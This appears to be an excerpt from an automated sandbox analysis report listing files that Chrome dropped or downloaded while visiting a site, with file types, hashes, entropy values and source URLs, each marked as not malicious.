          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
          Category:dropped
          Size (bytes):61
          Entropy (8bit):3.990210155325004
          Encrypted:false
          SSDEEP:
          MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
          SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
          SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
          SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
          Malicious:false
          Reputation:unknown
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:HTML document, ASCII text
          Category:downloaded
          Size (bytes):315
          Entropy (8bit):5.0572271090563765
          Encrypted:false
          SSDEEP:
          MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
          SHA1:A82190FC530C265AA40A045C21770D967F4767B8
          SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
          SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
          Malicious:false
          Reputation:unknown
          URL:https://pyrofel.com/favicon.ico
          Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
          Category:dropped
          Size (bytes):223
          Entropy (8bit):5.1754266442935375
          Encrypted:false
          SSDEEP:
          MD5:810193EDE98443698BA6B54575E9CF3C
          SHA1:719632E21DDF2A8CAFE2423E86520E515B621241
          SHA-256:A8C604F5780004055234EB042141127C52ABE99560F73A8F68395BFF99C38EC4
          SHA-512:5C43545615F5A6BCEBF243FF011AA1D88DEC94FE2288FBED7227076D481B44627E9FE3E620B655AFDA2DCAFFE5754FE577EBBFEE04B9BDBC86841A9AF42CC0EA
          Malicious:false
          Reputation:unknown
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:Web Open Font Format (Version 2), TrueType, length 27404, version 4.0
          Category:downloaded
          Size (bytes):27404
          Entropy (8bit):7.992616580398
          Encrypted:true
          SSDEEP:
          MD5:D72D711888BBD8AD9DB87EE0A654D3F1
          SHA1:BFE432FDEBD80321ED03F445C0FA94CD01A99C3B
          SHA-256:4107B11930C4EEF1F6AE5A76D441562E6D21A601F1781F37FD085542CD87412B
          SHA-512:204CE6CF69A2D7ADCA22677B53D1171BD3528AB1384997602710E628195D4F86A8041DBEE519BF2EEA9893F756077882C907B01703736500FC41853733B2E81D
          Malicious:false
          Reputation:unknown
          URL:https://framerusercontent.com/assets/vQyevYAyHtARFwPqUzQGpnDs.woff2
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ISO Media, AVIF Image
          Category:downloaded
          Size (bytes):37084
          Entropy (8bit):7.993142466149933
          Encrypted:true
          SSDEEP:
          MD5:C150749FD7E35BB4B47B41C715DE84A4
          SHA1:86B20F0074F7DDD9ADC1602505DDCB48D74DD490
          SHA-256:6B85E2CC77DD2EE567CD7E209D125A63538C8CFB3E52BAE4CC825BDB34E0E55E
          SHA-512:10120C8E0D0BDA9C9583D584A3649364ECCC7B52853B05ADF95AA921EAF5C48EDAA1CE523620C4A048EA2B8EF2143EF448B5FB93DDDC1BD888BD7D7BA3DEED27
          Malicious:false
          Reputation:unknown
          URL:https://framerusercontent.com/images/DPWmjQ9UNqOYphLbIRJTbZy9d1I.jpg
          No static file info